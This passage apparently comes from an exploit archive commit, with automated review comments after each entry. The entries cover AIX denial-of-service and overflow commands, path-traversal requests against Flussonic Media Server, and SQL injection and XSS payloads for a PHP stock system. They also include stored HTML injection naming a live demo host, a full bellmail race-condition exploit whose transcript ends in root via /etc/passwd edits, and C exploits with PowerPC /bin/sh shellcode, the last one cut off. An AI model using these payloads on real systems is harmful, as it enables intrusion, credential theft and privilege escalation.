and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash.
$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]
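Review bot: the entry has no title, date, author or affected-version header of the kind the other text entries in this commit carry (the '# Exploit Title:' / '# Date:' block); only the securityfocus source link identifies it, and the version 5.0.3 appears only in the prose. The prose also has two typos, "yu" for "you" and "hundered" for "hundred". Since the session uses "some.where" and 1.2.3.4 as stand-ins, a one-line note that these are placeholder names would stop readers taking them literally.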


@ -0,0 +1,10 @@
source: https://www.securityfocus.com/bid/66/info
A vulnerability exists in inetd which allows a remote user to crash inetd if the tcpmux service is not commented
out of /etc/inetd.conf. The tcpmux service is defined in RFC1078
$ nmap -p 1-64000 -i <target host>
It is also claimed inetd will die if the Windows 95/NT
program postscan.exe, made by 7thsphere, is run againts
the host.
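Review bot: "againts" should be "against", and the sentence "The tcpmux service is defined in RFC1078" is missing its full stop. The scan command "nmap -p 1-64000 -i <target host>" uses option syntax from an old nmap release; the entry should say which version it was written for, because a bare "-i" is not how later releases take a target. The postscan.exe statement is prefaced with "It is also claimed", so it should be marked as unverified rather than presented alongside the reproduced behaviour.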


@ -0,0 +1,10 @@
source: https://www.securityfocus.com/bid/520/info
adb is the debugger that ships with IBM's AIX operating system. It is possible for a local user to cause a local denial of service through exploiting the version of adb shipped with AIX 4.2 through 4.3.1. The consequence of adb being exploited is the machine being halted by a malicious local user.
gcc -g -o a.out hello-world.c
$ adb a.out -
adb
.main,5:s
a.out: running
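Review bot: the first command, "gcc -g -o a.out hello-world.c", is missing the "$" prompt that the following "adb a.out -" line carries, so the transcript reads as if gcc were typed inside the adb session; and hello-world.c is referenced but its contents are not included in the entry. The affected releases (AIX 4.2 through 4.3.1) are stated in the prose, but the entry has no title/date header like the other text entries here.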


@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/6840/info
A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application with the setuid bit applied, it may be possible to exploit this vulnerability to execute code with elevated privileges.
Under certain circumstances this issue may pose as a remote security threat.
/usr/lpp/X11/bin/aixterm -im `perl -e 'print "A"x47; print pack("l",0x11223344)'`
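Review bot: "Under certain circumstances this issue may pose as a remote security threat" is left unqualified; the entry should say what those circumstances are, or point at the part of the source advisory that describes them, because as written a reader cannot judge whether network exposure is in scope when prioritising the fix. "pose as" should be "pose". The affected releases (4.3, 5.1, 5.2) are in the prose but, like the neighbouring entries, there is no title/date/author header.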


@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/13909/info
invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line.
/usr/sbin/invscout `perl -e 'print "A" x 1024;'`
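Review bot: the entry names no affected AIX release, no date and no author; compare the libIM and adb entries above, which at least list the versions tested. The securityfocus BID 13909 link is the only provenance, so the header should be filled in from it before this is useful for matching against an inventory.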

133
exploits/aix/dos/33943.txt Normal file

@ -0,0 +1,133 @@
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
Release Date:
===========
June 29, 2014
Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.
Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3
Vulnerability Disclosure Timeline:
=========================
June 26, 2014 : Contact with Vendor
June 26, 2014 : Vendor Response
June 26, 2014 : Version 4.3.4 Deployed
June 29, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3
Exploitation Technique:
==================
AFR: Remote, Unauthenticated
ADL: Remote, Authenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
Its possible to read any files from the server (with the applications users permissions) by a simple HTTP GET request. Flussonics web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, its possible to login any Flussonic web interface using that method.
2. Arbitrary Directory Listing (Authenticated)
Its possible to list any directories content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;
live mylive;
file vod {
path priv;
}
2. Proof of Concept ADR Request & Response:
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive
HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
Solution Fix & Patch:
================
Update version 4.3.4
Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.
Credits & Authors:
==============
Bilgi Güvenliði Akademisi
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: http://bga.com.tr/advisories.html
Social: http://twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
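Review bot: the file path exploits/aix/dos/33943.txt does not match the content: Flussonic is an Erlang media server, not an AIX component, and the two issues described are arbitrary file read and directory listing, not denial of service, so this belongs under a webapps category. Within the text, the second PoC heading says "ADR" while the Exploitation Technique section calls it "ADL"; pick one. "Update version 4.3.4" should read "Update to version 4.3.4", the JSON body uses curly quotes ({“files") that are not valid JSON, and the Security Risk section rates the two issues together as "high and medium" without saying which is which.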

189
exploits/aix/dos/34588.txt Normal file

@ -0,0 +1,189 @@
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
#########################################################################################################
XSS install.php
code :
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
#########################################################################################################
SQL INJECTION : stock.php
code :
include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";
}
}
exploit :
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
#########################################################################################################
SQL INJECTION : view_customers.php
code :
$SQL = "SELECT * FROM customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
POST
searchtxt=1(inject)&Search=Search
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
SQL INJECTION : view_product.php
code :
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}
$page = $_GET['page'];
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
else
$start = 0; //if no page var is given, set start to 0
/* Get data. */
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";
}
$result = mysql_query($sql);
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
#########################################################################################################
UPLOAD : logo_set.php
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
AND MORE BUGS
Bye
#########################################################################################################
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
sec4ever.com & alm3refh.com
#########################################################################################################
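Review bot: exploits/aix/dos/34588.txt is the wrong path for a PHP web application advisory covering XSS, SQL injection and file upload; nothing here is AIX-specific or a DoS. The "SQL INJECTION : stock.php" claim is not supported by the code quoted: the query there is the fixed "SELECT * FROM stock_avail where quantity >0" and $q is only used in strpos() against the fetched rows, so no user input reaches SQL. In view_product.php the GET "limit" parameter is gated by is_numeric() before use and "page" only enters the query after arithmetic, so the "limit=1(inject)" vector is doubtful as shown; only the POST "searchtxt" branch concatenates input into the query. The logo_set.php excerpt is cut off right after '$type=$_FILES["file"]["type"];', before any move or write, so the quoted code shows an extension and MIME whitelist rather than a flaw; include the lines that handle the file or drop the claim. "Vulnerabilty" in the title should be "Vulnerabilities".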

111
exploits/aix/dos/35342.txt Normal file

@ -0,0 +1,111 @@
# Title : RobotStats v1.0 HTML Injection Vulnerability
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Twitter : https://twitter.com/milw00rm or @milw00rm
# Date : 22.11.2014
# Demo : http://alpesoiseaux.free.fr/robotstats/
# Download : http://www.robotstats.com/en/robotstats.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
Desc.:
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.
html inj.:
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
target.com/robotstats/info-robot.php?robot=(robot id)
or
target.com/robotstats/admin/robots.php you will see your html page
analysis: (/admin/robots.php)
include "robots.lib.php"; //line 26
else if ($rub == "ajouter")
{
updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
}
analysis: (/admin/robots.lib.php)
you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.
function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
//line 163 (remember function line 65 in robots.php)
{
global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
// dans tous les cas :
echo "<p class='normal'><a class='erreur'> ";
$msg = "";
// test du nom
if ($nom == '') //line 172 control of blank or not blank
{
$msg = $RS_LANG["BadRobotName"];
}
// test selon le mode de detection
if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
{
if ($user_agent == '') //line 180 control of blank or not blank
{
$msg = $RS_LANG["BadUserAgent"];
}
}
else if ($detection == $RS_DETECTION_IP) //line 185 control of your "detection mode" choice
{
if ( ($ip1 == '') && ($ip2 == '') ) //line 187 control of your "ip1 and ip2" choice
{
$msg = $RS_LANG["IPNotSpecified"];
}
}
else
{
$msg = $RS_LANG["BadDetectionMode"];
}
if ($msg != "")
{
echo $msg;
}
else
{
$liste_champs = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url"; // line 203 no any filter
$liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
if ($robot > 0) // cas d'une modification et non d'un ajout //line 205 control of your choice "wanna update any bot or add new bot"
{
$liste_champs .= ", id";
$liste_valeurs .= ", '$robot'";
$sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
$res = mysql_query($sql) or erreurServeurMySQL($sql);
echo $RS_LANG["RobotUpdated"];
}
else
{
$sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
$res = mysql_query($sql) or erreurServeurMySQL($sql);
echo $RS_LANG["RobotAdded"];
}
}
for demo:
http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
after you go here:
http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)
or
http://alpesoiseaux.free.fr/robotstats/admin/robots.php
you will see your html page
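Review bot: exploits/aix/dos/35342.txt is the wrong path; RobotStats is a PHP web application and the issue is stored HTML/script injection through an unauthenticated admin page, neither AIX nor DoS. The Desc. section says the admin folder has "no security" (no session control, no login) and then sets that aside as "maybe its different vulnerability"; the missing authentication is what lets an anonymous request reach updateDataBase() at all, so it should be the headline finding with the HTML injection as its consequence, and the fix advice should say so. The demo and analysis URLs name a live third-party host (alpesoiseaux.free.fr); the entry should use a placeholder such as target.com throughout, as the first example already does. "will'nt" should be "won't".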

289
exploits/aix/local/1001.txt Normal file

@ -0,0 +1,289 @@
-bash-2.05b$
-bash-2.05b$ cat x_aix5_bellmail.pl
#!/usr/bin/perl
# FileName: x_aix5_bellmail.pl
# Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail
# command on Aix5 to change any file owner to current user.
#
#Usage : x_aix5_bellmail.pl aim_file
# aim_file : then file wich you want to chown to you.
# Note : Maybe you should run more than one to "Race condition".
# The file named "x_bell.sh" can help you to use this exp.
# You should type "w" "Enter" then "q" "Enter" key on keyboard
# as fast as you can when bellmail prompt "?" appear.
#
# Author : watercloud@xfocus.org
# XFOCUS Team
# http://www.xfocus.net (CN)
# http://www.xfocus.org (EN)
#
# Date : 2004-6-6
# Tested : on Aix5.1.
# Addition: IBM had offered a patch named "IY25661" for it.
# Announce: use as your owner risk!
$CMD="/usr/bin/bellmail";
$MBOX="$ENV{HOME}/mbox";
$TMPFILE="/tmp/.xbellm.tmp";
$AIM_FILE = shift @ARGV ;
$FORK_NUM = 1000;
die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;
unlink $MBOX;
system "echo abc > $TMPFILE";
system "$CMD $ENV{LOGIN} < $TMPFILE";
unlink $TMPFILE;
$ret=`ls -l $AIM_FILE"`;
print "Before: $ret";
if( fork()==0 )
{
&deamon($FORK_NUM);
exit 0 ;
}
sleep( (rand()*100)%4);
exec $CMD;
$ret=`ls -l $AIM_FILE"`;
print "Now: $ret";
sub deamon {
$num = shift || 1;
for($i=0;$i<$num;$i++) {
&do_real() if fork()==0;
}
}
sub do_real {
if(-e $MBOX) {
unlink $MBOX ;
symlink "$AIM_FILE",$MBOX;
}
exit 0;
}
#EOF
-bash-2.05b$
-bash-2.05b$ cat x_bellmail.sh
#!/bin/sh
#File:x_bellmail.sh
#The assistant of x_aix5_bellmail.pl
#Author : watercloud@xfocus.org
#Date :2004-6-6
#
X_BELL_PL="./x_aix5_bellmail.pl"
AIM=$1
if [ $# ne 1 ] ;then
echo "Need a aim file name as argv."
exit 1;
fi
if [ ! -e "$1" ];then
echo "$1 not exist!"
exit 1
fi
if [ ! -x "$X_BELL_PL" ];then
echo "can not exec $X_BELL_PL"
exit 1
fi
ret=`ls -l $AIM`
echo $ret; echo
fuser=`echo $ret |awk '{print $3}'`
while [ "$fuser" != "$LOGIN" ]
do
$X_BELL_PL $AIM
ret=`ls -l $AIM`
echo $ret;echo
fuser=`echo $ret |awk '{print $3}'`
done
echo $ret; echo
#EOF
-bash-2.05b$ id
uid=201(cloud) gid=1(staff)
-bash-2.05b$
-bash-2.05b$ oslevel
5.1.0.0
-bash-2.05b$ oslevel -r
5100-01
-bash-2.05b$ ls -l /usr/bin/bellmail
-r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cp /etc/passwd /tmp/
-bash-2.05b$ ./x_bellmail.sh /etc/passwd
./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:30 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:35 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:40 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:43 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
w
From cloud Sun Jun 6 08:49:48 2004
abc
? From cloud Sun Jun 6 08:25:20 2004
abc
? w
bellmail: cannot append to /home/cloud/mbox
? w
bellmail: cannot append to /home/cloud/mbox
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:49:56 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun 6 08:50:01 2004
abc
? w
From cloud Sun Jun 6 08:25:20 2004
abc
? q
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd
-bash-2.05b$ su cloud
cloud's Password:
3004-502 Cannot get "LOGNAME" variable.
-bash-2.05b$ id
uid=201 gid=1(staff)
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd
-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:0:1::/home/cloud:/usr/local/bin/bash
test:!:201:1::/home/cloud:/usr/local/bin/bash
-bash-2.05b$ su cloud
cloud's Password:
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b# ls -l /etc/passwd
-rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd
bash-2.05b# cp /tmp/passwd /etc/passwd
bash-2.05b# chown root /tmp/passwd
bash-2.05b# ls -l /tmp/passwd
-rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#
# milw0rm.com [2005-05-19]
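Review bot: in x_bellmail.sh the test 'if [ $# ne 1 ]' is missing the hyphen on the operator ("-ne"), which is exactly the "0403-012 A test command parameter is not valid" message the transcript shows at ./x_bellmail.sh[11]; as posted, the argument-count check never runs. The pasted Perl also does not match what was run: both backtick commands read `ls -l $AIM_FILE"` with a stray closing double quote that a POSIX shell rejects as an unterminated string, yet the transcript prints the "Before:" lines cleanly, so the script in the entry is not the one that produced the session. "then file wich" in the usage comment should be "the file which". On the positive side the header records IBM's fix as APAR IY25661 and the tested level as 5.1 / 5100-01, which is the detail a defender needs from this entry.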

99
exploits/aix/local/1044.c Normal file

@ -0,0 +1,99 @@
/*
*
* IBM AIX netpmon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/netpmon";
args[1] = "-O";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/netpmon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
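Review bot: args is declared as char *args[3] but main() writes args[3] = NULL, one element past the end of the array; it needs to be char *args[4]. cex_load_environment() has a related pointer problem: env_buffer is advanced through both fill loops, so the later 'env_buffer[env_size - 1] = '\0';' and 'memcpy(env_buffer, "CAU=", 4);' operate on the already-advanced pointer, writing well beyond the egg allocation and placing "CAU=" after the payload rather than in front of it, which is plainly not what the name intends; keep the original pointer in a separate variable. The two loops also emit environment_size + 4 + strlen(payload) bytes into an allocation of EGGSIZE, and the return-address loop stores buffer_size/4 longs starting at address_buffer+3, overrunning the buffer by three bytes with unaligned 4-byte stores. The function always returns 0 and the caller ignores it; make it void.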

100
exploits/aix/local/1045.c Normal file

@ -0,0 +1,100 @@
/*
*
* IBM AIX ipl_varyon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
